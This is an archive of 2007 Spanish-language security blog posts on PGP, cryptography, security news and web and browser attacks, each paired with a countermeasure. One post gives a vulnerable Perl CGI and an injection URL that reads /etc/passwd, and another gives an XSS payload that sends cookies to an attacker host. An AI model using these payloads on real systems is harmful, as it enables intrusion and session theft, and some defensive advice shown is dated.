No abrir adjuntos no solicitados, ni hacer clic en enlaces de mensajes que llegan en forma de spam, son precauciones mínimas que nunca debemos olvidar.

Artículo completo Segu-Info

Reality Show de Seguridad Informática

2007-12-26T10:53:00.000-03:00

El 24 de Diciembre se estrenó en Estados Unidos un reality show sobre seguridad informática llamado “Tiger Team”.

En este programa podremos ver como 3 empleados de Alternative Technology (empresa de seguridad con sede en Colorado), entran en diversas redes corporativas haciendo uso de herramientas como Core Impact e ingeniería social, muestran que tan débil es la seguridad FISICA de dichas corporaciones.

Creación de un par de Claves en PGP

2007-12-23T02:45:00.000-03:00

En los siguientes pasos vamos a comenzar a utilizar esta Herramienta PGP y en esta opotunidad para crear un par de Claves (Pública/Privada). Para realizar lo siguiente debemos hacer:

pgp -kg

el argumento -kg le indica a la aplicación que deseamos crear el par de Claver (Pública/Privada).
A partir de este punto nos va a realizar una series de preguntas:


Por favor seleccione tipo de clave deseado:
 (1) DSA y ElGamal (por defecto)
 (2) DSA (sólo firmar)
 (5) RSA (sólo firmar)

para realizar las pruebas escojemos el (1)

La siguiente pregunta nos dice:


El par de claves DSA tendrá 1024 bits.
las claves ELG-E pueden tener entre 1024 y 4096 bits de longitud.
¿De qué tamaño quiere la clave? (2048)

aca debemos aclarar que mientras mas grande sea la clave, más seguridad obtendremos a cambio de una pequeña penalización en velocidad. Para este ejemplo escojamos el valor (2048).

Pasando a la siguiente pregunta tenemos:


Por favor, especifique el período de validez de la clave.
       0 = la clave nunca caduca
    = la clave caduca en n días
 w = la clave caduca en n semanas
 m = la clave caduca en n meses
 y = la clave caduca en n años
¿Validez de la clave (0)?

A modo de demostración en esta oportunidad escojeremos la opción (0), pero es importante intentar probar todos los parámetros, ya que los mismos no serán útiles para la implementación de políticas de seguridad.

Ahora llega el momento de indicarle datos propios del usuario, quizas algún comentario y su dirección de correo electronico:


Necesita un identificador de usuario para identificar su clave. El programa
construye el identificador a partir del Nombre Real, Comentario y Dirección
de Correo Electrónico de esta forma:
 "Heinrich Heine (Der Dichter) heinrichh@duesseldorf.de"

Una ves ingresado cada uno de estos parámetros, nos mostrará por salida los datos ingresados y solo nos bastará con aceptar los mismos en caso que estén bien ingresados, es posible modificar c/u de estos campos.

Por último se nos pide una contraseña para proteger nuestra Clave Privada, elige como contraseña una frase que te sea fácil de recordar. Esto se hace para proteger tu Clave Privada en caso de que te la roben, ya que no se puede usar sin introducir primero esta contraseña.

A continuación deberemos pulsar aleatoriamente varias teclas con el fin de ayudar a crear una secuencia de bits que el programa usará para generar números aleatorios. El programa se basa en el intervalo de tiempo pasado entre cada una de nuestras pulsaciones para crear esta secuencia de bits.

De este modo nos queda generado el par de Claves para el usuario ingresado, con el siguiente comando podemos listar todas las cuentas que tengamos:

pgp -kv

Ataques - Servidor Web 6

2007-12-20T16:03:00.001-03:00

SSL MiTM (Secure Sockets Layer)

SSL es utilizado en conexiones bancarias por tradición, pero se implementa en cualquier
esquema seguro de transferencia de información. (POP3S, IMAPS, HTTPS)
Forma un túnel seguro, dentro del cual se pueden meter otros protocolos de red (encapsulamiento).
SSL funciona por medio certificados públicos que envía el servidor a todos los clientes. Los clientes cifran la información que envían con dicho certificado, a su vez envían una llave criptográfica con la que el servidor podrá cifrar a la inversa. El cliente acepta el certificado basado en una firma digital emitida por una 3a. Entidad (verisign, thawte, rsa).
La única forma de verificar que el certificado es “auténtico” es revisando dicha firma. Los navegadores realizan este chequeo de forma automática cuando usamos SSL.

El problema:
No todas las organizaciones recurren a las autoridades certificadoras (debido al costo, entre otras cosas).

Impacto:
Cualquiera puede emitir certificados falsos (sin firmar por una autoridad) que
podrían engañar a un usuario.

El ataque:
SSL Man in The Middle
MiTM -> chango en medio
1.- El atacante envía un certificado falso al usuario
2.- El usuario acepta el certificado falso
3.- El atacante inicia la comunicación con el servidor con su propia llave criptográfica

Aunque se ha creado un túnel seguro, el atacante tiene acceso a él

Solución:
* Firmar los certificados con una autoridad como verisign (es costoso).
* O al menos verificar el “fingerprint” de los certificados que recibe el navegador. (tedioso para usuarios comúnes).
* Educar a los usuarios.

Ataques - Servidor Web 5

2007-12-20T15:07:00.000-03:00

Sniffing

Ataque pasivo enfocado a la recolección de información, esto es posible en redes que comparten el mismo medio (ethernet, campo fértil para los atacantes)

Información interesante en tránsito: logins, passwords, correos, tareas, mensajero, icq, etc.

Solución:
* Utilizar cifrado de la información (VPNs: PPtP,IPsec; SSL, GPG)
* Utilizar switches en lugar de hubs (este mecanismo aún puede ser roto, no es
infalible).

Instalando PGP en nuestra máquina

2007-12-16T19:21:00.000-03:00

Bueno, básicamente nos vamos a abocar en instalar PGP en nuestros sistema, para ello vamos a utilizar cualquier distribución GNU/Linux y de una conexión ADSL.

Utilizando la consola o terminal de nuestro sistema, nos logeamos como root o superusuario y escribimos:

apt-get install pgp

si no encontramos este paquete podemos instalar entonces pgpgpg:

apt-get install pgpgpg

Con esto esperamos a que se descarguen todos los paquetes y se configuren automáticamente en nuestro sistema.
Cabe aclarar que el entorno es en modo texto o visualizado a traves de la misma consola o terminal utilizada en la instalación, si bien contamos con entornos gráficos para esta administración como ser el caso KGpg entre otras, en este taller nos vamos a abocar a utilizar y aprender a utilizar en modo texto.

¿Que son las Firmas Digitales?

2007-12-14T14:23:00.000-03:00

La firma digital es, en la transmisión de mensajes telemáticos y en la gestión de documentos electrónicos, un método Criptográfico que asocia la identidad de una persona o de un equipo informático al mensaje o documento. En función del tipo de firma, puede, además, asegurar la integridad del documento o mensaje.

La firma electrónica o digitales, como la firma autógrafa (manuscrita), puede vincularse a un documento para identificar al autor, para señalar conformidad (o disconformidad) con el contenido, para indicar que se ha leido o, según el tipo de firma, garantizar que no se pueda modificar su contenido.

PGP también ofrece autentificación de la información. Veamos por qué:

Nuestra llave privada, además de para encriptar los mensajes, también puede ser usada para "firmar" la información enviada, de forma análoga a las firmas que realizamos a menudo sobre documentos en papel.
Un documento que haya sido firmado digitalmente con nuestra llave privada, podrá ser autentificado por cualquiera que disponga de nuestra llave pública. Esto es útil para comprobar que el documento proviene efectivamente de quien se supone y que nadie lo ha manipulado o falsificado.
Ambos procesos, encriptación y firma, pueden ser realizados para ofrecer privacidad y autentificación.

¿Cómo funciona la criptografía de Clave pública?

2007-12-13T13:38:00.000-03:00

En Sistemas de Clave o Llave Pública, cada persona tiene dos llaves que son complementarias entre sí, una es la llave pública y otra la llave privada.

La Clave Pública puede y debe ser difundida libremente, ya que será con ella con la que el resto de personas podrán enviarte información de manera privada. A través de la Clave Pública no se pone en peligro la privacidad de tu Clave Privada.

Supongamos un Ejemplo Daniel y Gustavos son Administradores de Seguridad Segura. Daniel podrá enviarle información de manera privada a Gustavo si conoce su Clave Pública. Por otro lado Gustavo podrá desencriptar el mensaje por medio de su propia Clave Privada.

Recordemos esto:

La seguridad del sistema se basa en que cada uno guarde su llave privada, aunque la llave pública pueda ser ampliamente conocida. Si alguien se plantease romper el sistema desconociendo la llave privada del receptor, tardaría tantos años en hacerlo que sería inútil.

Las 10 peores amenazas de seguridad para 2008

2007-12-11T12:52:00.000-03:00

The Inquirer ES: La empresa de seguridad Websense predice la lista de amenazas que a su juicio tendrán más relevancia en el nuevo año. Entre ellas destaca el aumento de spam en la blogosfera para derivar tráfico a sitios infectados, ataques a las plataformas web aprovechando la popularidad del iPhone y la esperada actividad con motivo de los Juegos Olímpicos de Pekín.

La lista de estas amenazas la encabeza los ataques, fraudes y estafas basados en eventos como el de los juegos olímpicos del año próximo. El aumento del spam en foros, blogs, o comentarios en sitios de noticias será otro foco de actividad importante según el informe. A ellos se suman los ataques en plataformas web mediante el envío de código específico para ese sistema (Mac OSX, iPhone y Windows, principalmente), en vez de enviar ataques sólo basados en exploradores.

Incrementos en ataques contra web 2.0, conversión de JavaScript para evadir antivirus, incremento de la cripto-virología y las prácticas fraudulentas con uso de protocolo de voz sobre IP (vishing) y spam de voz, son otras de las vulnerabilidades anunciadas.

5 claves para proteger tu WiFi

2007-12-11T12:41:00.000-03:00

Si dispones de una conexión inalámbrica deberías tener en cuenta algunos consejos prácticos para tratar de proteger el acceso si no quieres que algún ‘caradura’ se aproveche de tu ancho de banda.

1. Cobertura de la señal: es interesante limitar la fuerza de la señal WiFi para que esta sólo esté disponible a corto alcance.

2. Ocultación del ESSID: este identificador de nuestra red WiFi (como los famosos WLAN_XX de Telefónica) puede ser ocultado para que los usuarios ‘casuales’ no vean el nombre de la red y sea más molesto el posible acceso a la misma.

3. Cifrado WPA: aunque se ha demostrado que ningún método de cifrado es completamente seguro - sobre todo el cifrado WEP, realmente pobre - el cifrado WPA/WPA2 añade mejoras que también harán algo más complicado el proceso de posible detección de claves.

4. Cambia tu clave WiFi con frecuencia: si es posible, modificar la clave WiFi supondrá un seguro más para impedir el acceso a posibles intrusos.

5. Filtrado MAC: las direcciones MAC son identificadores únicos de cada dispositivo de red - tarjetas de red alámbricas o inalámbricas - y por tanto si activamos esta opción y listamos las direcciones MAC de nuestros dispositivos sólo ellos tendrán acceso. Un atacante tendría que averiguar las MACs ‘permitidas’ para luego poder suplantarlas, de modo que esta media aumenta un poco más el nivel de protección.

Videos sobre seguridad en ASP.NET

2007-12-10T14:11:00.000-03:00

No quería dejar pasar esta oportunidad y mostrarle y mas que nada hacercales estos vides de Seguridad en ASP.NET, para aquellos programadores que lo utilizan.

Canonicalization: Explica sobre los ACLs e impersonación de usuarios para acceder a recursos, así como usar Server.MapPath para limitar el acceso sólo a rutas que esten dentro del directorio virtual de una aplicación.
Cookies: Muestra como detectar la alteración de cookies.
Cross-Site Scripting: Explica que es XSS y como prevenir éstos ataques.
Regular Expressions: Explica el uso de expresiones regulares para la validación de los datos.
SQL Injection: Explica que es SQL Injection y cómo evitar este tipo de ataques usando consultas parametrizadas.
Validation Controls

Fuentes DragonJar

Ataques - Servidor Web 4

2007-12-09T22:45:00.000-03:00

CGI – SQL Injection

Consiste en manipular las consultas realizadas a sistemas que emplean bases de datos accesibles por web.
Permite recuperar información que no ha sido autorizada e inclusive cambiarla y borrarla.
Se ingresan caracteres especiales, de relevancia para el manejador de BD: ‘ , ;
Muchos programadores usan javascript para filtrar estos caracteres especiales, pero... esto les parece bueno?
Pues lamento desilucionarlos pero el atacante puede simplemente guardar el html localmente, y editarlo (removiendo el javascript). Pudiendo así finalmente introducir los caracteres especiales.
“El navegador es territorio del enemigo” (Ed Skoudis).

Solución:
Construir aplicaciones web que no permitan la salida de caracteres extraños que pudiera introducir el usuario:
* Comillas y apostrofes (‘, “, y ‘) como terminadores de cadena
* Punto y coma (;) – Terminador de Búsquedas
* Asterisco (*) – Selector comodin de campos
* Guión Bajo (_) – Compara cualquier Caracter
* Otros Metacaracteres del Shell(&\|*?~<>[]{}$\n\r)

Taller de PGP

2007-12-09T18:36:00.000-03:00

Vamos a comenzar con los Talleres o Review de algunas herramientas de seguridad, en esta primera oportunidad les vamos a mostrar la herramienta Pretty Good Privacy PGP, seguramente habrás visto algunos post referentes a este tema, pero lo que queremos lograr con este Taller y con los próximos que vamos a realizar es completar en su totalidad estos temas.

Ahora el resumen de los temas a tratar en este Taller denominado "Taller de PGP":

¿Qué es PGP?
¿Como funciona la criptografía de Clave Pública?
¿Que son las Firmas Digitales?
Instalando PGP en nuestra máquina
Creación de un par de Claves
Añadiendo Claves a nuestro anillo
Extrayendo Claves de nuestro anillo
Encriptando Mensajes
¿Cómo Firmar un Mensaje?
Desencriptando
El uso de PGP en los Correos Electrónicos
Conclusiones

Pretty Good Privacy - PGP

2007-12-08T13:42:00.000-03:00

Pretty Good Privacy o PGP (privacidad bastante buena) es un programa desarrollado por Phil Zimmermann y cuya finalidad es proteger la información distribuida a través de Internet mediante el uso de criptografía de clave pública o Criptografía Asimétrica, así como facilitar la autenticación de documentos gracias a firmas digitales.

PGP originalmente fue diseñado y desarrollado por Phil Zimmermann en 1991. El nombre está inspirado en el del colmado Ralph's Pretty Good Grocery de Lake Wobegon, una ciudad ficticia inventada por el locutor de radio Garrison Keillor.

Nueva versión de Skype corrige vulnerabilidad crítica

2007-12-08T12:22:00.000-03:00

La última versión 3.6 de Skype corrige una vulnerabilidad crítica que puede llevar al compromiso total de una máquina Windows, y una vez más parece que lo hace en riguroso secreto, por cuanto su sección de avisos de seguridad no muestra información alguna al respecto.

Se trata de una variante del famoso bug en el manejo de URIs en Windows, que tantos quebraderos de cabeza viene produciendo. No se sabe si la vulnerabilidad ha sido de hecho introducida con el parche para ese problema que Skype presentó a finales del pasado mes de septiembre, en su versión 3.5.0.239 para Windows...

Si algo está claro, es que los usuarios de Skype deben actualizar su programa cliente a la última versión 3.6 cuanto antes.

Artículo completo Kriptopolis

Ataques - Servidor Web 3

2007-12-07T18:25:00.000-03:00

CGIs (Command execution attack)
Es un estándar para comunicar aplicaciones externas con los servidores de información, tales como servidores Web.
Un programa CGI es ejecutado en tiempo real, así que puede generar información dinámica.
Una de las razones por las cuales las vulnerabilidades en los CGIs están tan extendidas es el hecho de que la mayoría de los CGIs han sido programados por usuarios para dar dinamismo a sus paginas pero sin preocuparse de las implicaciones de seguridad.

Consiste en la ejecución de comandos del sistema, se produce cuando datos sin validar introducidos por el usuario conforman parte de una llamada del programa a un subshell. A veces el programador llama a algún comando del sistema para que realice la acción necesaria en vez de implementarla con código propio.

Ej.:

#!/usr/bin/perl
print "Content-type:text/html\n\n";
print << EndOfHTML;
<html> <head> <title> Print Environment </title></head>
<body>
EndOfHTML
$HOST=$ENV{"QUERY_STRING"};
$HOST=~ s/%(..)/pack("c",hex($1))/ge;
print "Resolviendo Dominio $HOST";
system("/usr/bin/nslookup $HOST");
print "<br></body></html>";

Este programa en perl se encarga de resolver el dominio introducido por un usuario en un formulario web. Para ello utiliza el comando nslookup del sistema operativo. En es punto es donde reside el fallo. No se ha efectuado ninguna validación sobre los datos introducidos por el usuario en el formulario y enviados al CGI.

Si quisiéramos por ejemplo listar el archivo de passwords del sistema haríamos:

http://victima.com/cgi-bin/nslookup.cgi?falsodominio;/bin/cat%20/etc/passwd

Salida:
Resolviendo Dominio falsodominio;/bin/cat /etc/passwdServer: centauri
Address: 172.26.0.5#53 ** server can't find falsodominio: NXDOMAIN
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:100:sync:/bin:/bin/sync
games:x:5:100:games:/usr/games:/bin/sh

Solución:
Validar la entrada del usuario evitando la introducción de caracteres conflictivos como:
; | .. / \ etc.

Los Criptosistemas

2007-12-07T11:23:00.000-03:00

Matemáticamente, podemos definir un criptosistema como una cuaterna de elementos {}, formada por:

Un conjunto finito llamado Alfabeto, a partir del cual, y utilizando ciertas normas sintácticas y semánticas, podremos emitir un mensaje en claro (plain text) u obtener el texto en claro correspondiente a un mensaje cifrado (cipher text). Frecuentemente, este alfabeto es el conjunto de los enteros módulo , , para un dado.
Otro conjunto finito denominado Espacio de Claves, formado por todas las posibles claves, tanto de cifrado como de descifrado, del criptosistema.
Una familia de aplicaciones del alfabeto en sí mismo, llamadas Transformaciones de Cifrado.
Otra familia de aplicaciones del alfabeto en sí mismo, llamadas Transformaciones de Descifrado.

Denegacion de servicio en Squid

2007-12-07T11:08:00.000-03:00

Se ha descubierto una vulnerabilidad en Squid en el procesamiento de algunas actualizaciones del cache, esta vulnerabilidad permitiria a usuarios de confianza realizar un ataque de denegacion de servicio. La vulnerabilidad es corregida en la version 2.6.STABLE17.

Artículo RetroNet

Error de QuickTime explotado activamente en Internet

2007-12-06T12:52:00.000-03:00

El exploit Zero-Day anunciado hace una semana, está siendo activamente explotado en Internet, según informa Symantec, quién elevó su nivel de alertas a la posición número 2 (nivel medio).

La explotación se produce a través del protocolo RTSP (Real Time Streaming Protocol), utilizado para realizar streaming, técnica de transmisión unidireccional de contenidos de video y audio a través de Internet.

Se sabe que la vulnerabilidad está siendo explotada al menos a través de un servidor comprometido, y provoca la descarga de dos archivos maliciosos en el equipo de la víctima.

En este momento, Apple no ha publicado todavía ninguna actualización de QuickTime para solucionar el problema. El ataque provoca un desbordamiento de búfer, provocado por un insuficiente control en QuickTime sobre el tamaño de ciertos datos recibidos.

Artículo completo RetroNet, VSAntivirus

Las llaves USB, un riesgo de seguridad

2007-12-06T12:44:00.000-03:00

Aunque los robos de portátiles están muy de moda, deberías estar atento a tu llave USB, un dispositivo que cada vez almacena más datos y que puede convertirse en un verdadero quebradero de cabeza si se pierde o nos lo roban.
Un reciente evento dedicado a la seguridad que reunió a varios Chief Information Officer de varias empresas destacó un problema en el que pocos se habrían parado a pensar. Las llaves de memoria USB actuales logran almacenar hasta 16 Gbytes de datos y las previsiones son que llegarán tarde o temprano a los 128 Gbytes, una capacidad que los convertirá en discos duros portátiles muy susceptibles de ser robados y, cómo no, perdidos.

El peligro reside en la gran cantidad de datos de todo tipo que pueden almacenarse en estos dispositivos, y lo es más cuando en el caso de algunos tipos de memoria - como las SanDisk Cruzer - es posible convertir las llaves USB en ‘PCs portátiles’ al llevar el sistema operativo, aplicaciones y datos con nosotros en todo momento. Una vez conectados a un PC y arrancando desde la llave, accederemos a un entorno de trabajo privado al que cualquiera podría tener acceso si se roba esa llave.

Las contraseñas para acceder a las llaves USB o el cifrado de dato parecen las soluciones más claras para limitar esos riesgos, así que tened cuidado con lo que almacenáis en estos pequeños dispositivos.

Artículo completo Segu-Info

Ataques - Servidor Web 2

2007-12-05T15:24:00.000-03:00

Fuerza bruta

* Los controles de acceso tradicionales constan de una pareja login/password.
* Los ataques de fuerza bruta usualmente escogen un “login” válido y prueban un sinfín de passwords diferentes intentando adivinar.
* El mismo servidor web proporciona información valiosa al atacante.

Existen herramientas que automatizan el ataque, forzando el password de un usuario válido del sistema.

* Usuario-valido / aaaa
* Usuario-valido / aaab
* Usuario-valido / aaac
* Usuario-valido / aaad

Diversas aplicaciones (por ejemplo de la banca en línea) permiten sólo 3 equivocaciones en la password de acceso, después se bloquean.

Sin embargo existe un ataque aún más peligroso y “truculento”:
* Si el sistema bloquea la cuenta al 3er. intento, porqué no sólo intentar 1 sola vez?
Esto se hace posible variando el login, en
lugar de la password:
* Usuario-valido1 / aaaa
* Usuario-valido2 / aaaa
* Usuario-valido3 / aaaa
* Usuario-valido4 / aaaa

Solución: Insertar cuentas de “señuelo”, que no estén asignadas a ningún usuario válido. Al detectarse un intento de acceso a alguna de estas cuentas señuelo se deben tomar medidas anti-intrusivas. (bloqueo de IPs por ejemplo)

Creador de red de “PCs Zombies” es autista

2007-12-05T12:32:00.000-03:00

Owen Walker, más conocido como “Akill”, fue detenido por la policía de Nueva Zelanda y el FBI acusado de crear un código malicioso que controlaba 1,3 millones de PCs Zombies

La policía considera que este joven de 18 años es el creador de un código malicioso muy perfeccionado totalmente transparente para los antivirus y distribuido por el equipo de crackers profesionales “A-team”.

El código de Akill habría infectado a 1,3 millones de ordenadores en todo el mundo pasando a ser controlados por los crackers para enviar spam, infectar otros equipos o vaciar información personal de los usuarios.

Además, estos equipos estarían preparados para realizar ataques DDoS contra otros sistemas.

Según la policía el virus habría causado daños por valor de 20 millones de dólares. El FBI está investigando si el muchacho se enriqueció con el código al entregar este al grupo “A-Team” que fueron los que lo habían distribuido y controlaban la red.

“Es Autista”

La madre de Owen dijo a la prensa que su hijo dispone de de una pasión hacía los ordenadores vinculada al “autismo” que padece. Una de las características de esta enfermedad es el autoaislamiento de los que la padecen.

Por su parte los amigos y compañeros de antiguos trabajaos dijeron que Owen es un programador brillante. Una cualidad que también fue destacada por los responsables de la policía local al afirmar que este “brilla por su capacidad para producir este tipo de códigos”.

Artículo completo Segu-Info

Suma de Verificación con MD5

2007-12-04T23:38:00.000-03:00

Una suma de verificación o checksum es una forma de control de redundancia, una medida muy simple para proteger la integridad de datos, verificando que no hayan sido corrompidos. Se emplean a diario en muchos ámbitos de Internet, Archivos, Transferencia, etc.

Vamos a realizar algunas pruebas utilizando el Algoritmo Redundante MD5, para lo cual vamos a utilizar el Sistema Operativo GNU/Linux y un programa llamado md5sum.

Básicamente vamos a realizar lo siguiente, vamos a crear un archivo, lo vamos a pasar por este algoritmo y vamos a ver como saber si este archivo fue modificado o no y si cumple realmente con su integridad.

Para comenzar creamos un archivo llamado archivo.txt
$ vim archivo.txt
y le ingresamos cualquier contenido y lo guardamos.

Luego ejecutamos el siguiente comando
$ md5sum archivo.txt > archivo.md5
lo cual generaremos un archivo ".md5" con el checksum adentro como contenido.

Ahora bien para comprobar la integridad del archivo "archivo.txt" realizamos lo siguiente:
$ md5sum -c archivo.md5
el parámetro -c realiza el chequeo
esto nos puede arrojar dos errores, si el archivo NO fue modificado podemos obtener:
$ archivo.txt: La suma coincide
en caso que SI se haya modificado el archivo nos dirá:
$ archivo.txt: La suma no coincide

De este modo, logramos aplicar el algoritmo MD5 y a través de la suma de redundancia y la verificación logramos corroborar la integridad de los archivo. Cabe aclarar que este algoritmos se puede aplicar a cualquier clase de archivos, bases de datos, imágenes ISO, etc.

¿Que es MD5?

2007-12-04T22:15:00.000-03:00

En el contexto de la Criptografía, MD5 (acrónimo de Message-Digest Algorithm 5, Algoritmo de Resumen del Mensaje 5) es un Algoritmo de Reducción Criptográfico de 128 bits ampliamente usado.

Este algoritmo de Redundancia Criptográfica fue diseñado por el profesor Ronald Rivest del MIT (Massachusetts Institute of Technology, Instituto Tecnológico de Masachusets), desarrollado en 1991 como reemplazo del conocido hasta ese momento como MD4 y contemplando las debilidades de la misma.

A pesar de su amplia difusión actual, la sucesión de problemas de seguridad detectados desde que, en 1996, Hans Dobbertin anunciase una colisión de hash plantea una serie de dudas acerca de su uso futuro.

Alemania: 18.9% de las 741 empresas consultadas reconoció haber sido víctima de robo de información

2007-12-04T21:21:00.000-03:00

Segu-Info: El espionaje industrial florece en Alemania. Su número de casos crece 10% cada año. Los sectores más afectados son el automotriz, el de la fabricación de aviones y el de maquinaria, así como la industria metalúrgica y de materias primas. El objetivo central del espionaje son las innovaciones técnicas, el know how de los procesos de producción. Detrás de esta metodología hay gobiernos extranjeros y empresas de la competencia. Muchas compañías alemanas no asumen debidamente el peligro y carecen de un concepto integral para prevenirlo.

Tales son las conclusiones de un estudio realizado por la consultora de negocios Corporate Trust, la Oficina de Criminología Aplicada de Hamburgo y el periódico Handelsblatt de la misma ciudad.
Según el estudio --dado a conocer el pasado 22 de noviembre--, 18.9% de las 741 empresas consultadas reconoció haber sido víctima de robo de información valiosa. La denuncia frente a las autoridades se efectuó sólo en un cuarto de los casos. Las empresas suelen contratar especialistas privados, pero evitan que las filtraciones padecidas se hagan públicas, por temor a perder credibilidad e imagen. A esto hay que sumar la cifra --elevada, según estiman expertos-- de los casos que no han sido descubiertos.

La información sustraída a través del espionaje va a parar a empresas de la competencia en Alemania y otros países que, de este modo, ahorran gastos de investigación y desarrollo de productos. También a Estados, que así pueden delinear sus estrategias económicas.
El acceso a los datos se realiza por caminos diversos. De acuerdo con el estudio, en la mayoría de los casos (20.3%) son los propios empleados quienes brindan datos sensibles, motivados por el soborno, por ansias de venganza contra la compañía o al ser sorprendidos en un descuido. En algunos casos, el acceso a la información es más fácil de lo que parece. Bastan un par de preguntas formuladas con habilidad --en una feria industrial, por ejemplo-- para arrancarle algunos datos relevantes al interlocutor correcto.

También se computa como flujo indeseado de información el caso de los empleados que se independizan y los que pasan a trabajar para la competencia.
De acuerdo con el estudio, en 14.9% de los casos el espionaje industrial se realizó a través de hackers que perforan con “troyanos” la seguridad de las empresas. Le siguen las escuchas secretas de charlas de directivos (10.7%) y la intercepción de llamadas, fax y correos electrónicos (5.3%).

Criptografía Asimétrica

2007-12-03T16:38:00.000-03:00

La Criptografía Asimétrica es el método criptográfico que usa un par de claves (2 Claves) para el envío de mensajes. Las dos claves pertenecen a la misma persona a la que se ha enviado el mensaje.

Una Clave es Pública y se puede entregar a cualquier persona, la otra Clave es Privada y el propietario debe guardarla de modo que nadie tenga acceso a ella. El remitente usa la clave pública del destinatario para cifrar el mensaje, y una vez cifrado, sólo la clave privada del destinatario podrá descifrar este mensaje.

Los sistemas de cifrado de Clave Pública o sistemas de cifrado asimétricos se inventaron con el fin de evitar por completo el problema del intercambio de claves de los sistemas de cifrado simétricos.

Con las Claves Públicas no es necesario que el remitente y el destinatario se pongan de acuerdo en la clave a emplear. Todo lo que se requiere es que, antes de iniciar la comunicación secreta, el remitente consiga una copia de la clave pública del destinatario. Es más, esa misma clave pública puede ser usada por cualquiera que desee comunicarse con su propietario. Por tanto, se necesitarán sólo n pares de claves por cada n personas que deseen comunicarse entre sí.

Criptografía Simétrica o Convencional

2007-12-03T14:44:00.000-03:00

La Criptografía Simétrica es el método criptográfico con la particularidad que usa una misma Clave para cifrar y descifrar mensajes. Las dos partes que se comunican han de ponerse de acuerdo de antemano sobre la Clave a usar.

Una vez ambas tienen acceso a esta clave, el remitente cifra un mensaje usándola, lo envía al destinatario, y éste lo descifra con la misma.

Un grupo de 'crackers' intentaban controlar un millón de ordenadores

2007-12-03T14:31:00.000-03:00

Las autoridades de Nueva Zelanda confirmaron hoy que un adolescente de este país ha sido interrogado acerca de la posibilidad de pertenecer a un plan organizado por unos piratas informáticos para controlar más de un millón de ordenadores a través de la Red y usarlos en actividades criminales.

En una investigación iniciada por el FBI, más de 2 millones y medio de personas fueron confirmadas como usuarios de ordenadores que habían sido víctimas de la llamada actividad 'botnet', informó la cadena CNN.

Los 'crackers' ('hackers' que persiguen un fin lucrativo) introducían virus, gusanos informáticos y otros programas hostiles que les permitían tomar el control de las computadoras y usarlas para cometer 'ciber crímenes'. Según cifras de la industria, cerca de 5 millones de usuarios podrían tener sus ordenadores infectados sin saberlo.

Articulo @ El Pais

Ataques - Servidor Web

2007-12-03T00:14:00.000-03:00

Exploits remotos
Programa o técnica que toma ventaja de un hueco de seguridad para comprometer un sistema. Hoy en día una fuente importante de huecos de seguridad es debida a errores de programación (desbordamientos de buffer, formato de cadena).

Puertas traseras
Mecanismos que permiten el acceso a un sistema, evadiendo los controles de acceso del servidor. En ocasiones, dejados intencionalmente por los programadores, en otros casos dejados inadvertidamente por el administrador.

Ingeniería social
Es la técnica especializada o empírica del uso de acciones estudiadas o habilidosas que permiten manipular a las personas para que voluntariamente realicen actos que normalmente no harían.

DoS (negación de servicio)
Va enfocado a interrumpir la disponibilidad de los recursos de un servidor (web, e-mail, chat).

Fuerza bruta
Técnica que consiste en intentos reiterados de accesar por medio de los controles de acceso legítimos, buscando algún password débil.

Más adelante se hablara de cada uno de ellos.

Ataques - Navegador 3

2007-12-03T00:06:00.000-03:00

* Phishing
Suplantación de identidad que busca apropiarse de datos confidenciales de usuarios de la red, por medio de una página que imita a la original.
Se utiliza el correo electrónico como medio de difusión. El mensaje incluye una liga en la que el usuario debe hacer click para conectarse en apariencia al sitio web auténtico.

El atacante obtiene información del tipo:
“5177 2939 2949 9349” “exp. 08/05”
“jperez” “sekreto123”

Solución:
- No dar click a ligas de páginas de servicios que lleguen por correo electrónico.
- Aplicar parches de seguridad a los navegadores.
- Desconfiar de solicitudes de entregar información y verificar las URLs (particularmente de bancos)

Ataques - Navegador 2

2007-12-02T23:48:00.000-03:00

* XSS – Cross site scripting
Esta técnica permite redireccionar información del usuario hacia el sitio de un atacante. Esto se logra por medio de la inserción de funciones de javascript que permiten incluir páginas externas dentro de una página dinámica.
En concreto es de uso común la función: "document.location.href"

EJ.:
http://www.banco.com/paginadinamica.php?variable=">{script} document.location.href=
'http://www.atacante.com/cgi-bin/captura.cgi?'%20+document.cookie {/script}

En el ejemplo se reemplazó el < por un una { al igual que el de cierre para poder visualiar el ejemplo.

El atacante obtiene información del tipo:
usrid=13455; bookmark=paginadinamica.php
ticket=ED4123G4ga3few38dO;
domain=www.banco.com

Solución:
Inhabilitar Javascript.

Ataques - Navegador

2007-12-02T23:37:00.000-03:00

* Java.
En la actualidad es más o menos seguro.Vulnerable a ataques enfocados al usuario

* Javascript.
Inseguro, se puede enviar información desde formularios html, problemas enfocados a la privacidad.

* ActiveX.
También vulnerable a ataques enfocados al usuario (applets sin certificado).

Las finalidades de la Criptografía

2007-12-02T00:35:00.000-03:00

Las finalidades de la Criptografía es, en primer lugar, garantizar el secreto en la comunicación entre dos entidades (personas, organizaciones, etc.) y, en segundo lugar, asegurar que la información que se envía es auténtica en un doble sentido: esto significa que el remitente sea realmente quien dice ser y que el contenido del mensaje enviado, habitualmente denominado Criptograma, no haya sido modificado en su tránsito.

Otro método utilizado para ocultar el contenido de un mensaje es ocultar el propio mensaje en un canal de información, pero en puridad, esta técnica no se considera Criptografía, sino Esteganografía (más adelante hablaremos de él). Por ejemplo, mediante la Esteganografía se puede ocultar un mensaje en un canal de sonido, una imagen o incluso en reparto de los espacios en blanco usados para justificar un texto. La Esteganografía no tiene porqué ser un método alternativo a la Criptografía, siendo común que ambos métodos se utilicen de forma simultánea para dificultar aún más la labor del Criptoanalista.

Ahora bien, más adelante trataremos mas conceptos relacionados con la Criptografía, Esteganografía y las diferentes técnicas y métodos que encontramos hoy en día para ser uso de estas ciencias.

¿Qué es la Criptografía?

2007-12-02T00:28:00.000-03:00

Wikipedia: La Criptografía (del griego kryptos, «ocultar», y graphos, «escribir», literalmente «escritura oculta») es el arte o ciencia de cifrar y descifrar información utilizando técnicas que hagan posible el intercambio de mensajes de manera que sólo puedan ser leídos por las personas a quienes van dirigidos.

Con más precisión, cuando se habla de esta área de conocimiento como ciencia se debería hablar de criptología, que engloba tanto las técnicas de cifrado, la criptografía propiamente dicha, como sus técnicas complementarias: el criptoanálisis, que estudia los métodos que se utilizan para romper textos cifrados con objeto de recuperar la información original en ausencia de la clave.

Dificultades para detectar los Fraudes

2007-12-01T11:55:00.000-03:00

Los Fraudes Informáticos son difíciles de detectar cuando:

